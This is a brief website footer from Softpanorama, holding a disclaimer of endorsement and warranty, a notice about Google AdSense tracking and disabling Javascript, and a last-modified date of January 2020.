The statements, views and opinions presented on this web page are those of the author (or referenced source) and are not endorsed by, nor do they necessarily reflect, the opinions of the Softpanorama society. We do not warrant the correctness of the information provided or its fitness for any purpose. The site uses AdSense so you need to be aware of Google privacy policy. You you do not want to be tracked by Google please disable Javascript for this site. This site is perfectly usable without Javascript.

Last modified: January, 09, 2020